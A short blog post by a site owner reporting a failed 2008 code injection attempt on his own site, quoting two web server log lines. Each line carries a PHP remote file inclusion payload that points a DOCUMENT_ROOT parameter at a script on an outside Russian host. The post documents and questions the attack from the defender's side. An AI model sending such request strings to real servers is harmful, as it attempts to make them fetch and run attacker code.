Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Home
Benchmark $\/$
GfxBench2D Development Log
Projects $\/$
Amiga OS 4 Projects Silverstripe/PHP Projects wxWidgets Projects Free Ideas The Source-Code Recycling Bin Want to Help?
Articles $\/$
Amiga OS 4 Articles 3D Graphics via OpenGL Essential Software Development Tools A (Linux) Server for Software Developers Linux Troubleshooting Protecting Hardware and Data Website Hacking Attempts Windows Development Windows Troubleshooting
Blog
Forums $\/$
Amiga OS Projects Silverstripe Projects GfxBench2D General Software Development OpenGL/3D-Graphics General Discussion
About $\/$
Contact Republishing Terms of Service Privacy Policy

Blog » Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Posted by Hans de Ruiter

Hot on the heels of the last code injection attempt comes another one; this time the attempt to breach security appears to have a Russian connection. The new log entries are as follows:

195.2.72.173 - - [24/Jul/2008:20:06:15 -0400] "GET /bot-attack//?_SERVER[DOCUMENT_ROOT]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.63"
195.2.72.173 - - [24/Jul/2008:20:06:16 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 200 11961 "-" "libwww-perl/5.63"

Ironically, this latest attempt targets the blog entry about the previous attempt. The questions that remains are:

Who is responsible for this (i.e., who owns http://www.proxi-com.ru/mambots/readme.txt)?
What exactly would happen if this attach were successful?
How can those responsible be stopped?

Whilst this attack was once again unsuccessful, it would be nice to be able to track down the perpetrators and have them shut down.

FeedBurner

Tag Cloud

Browse by Date

Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Post your comment

Comments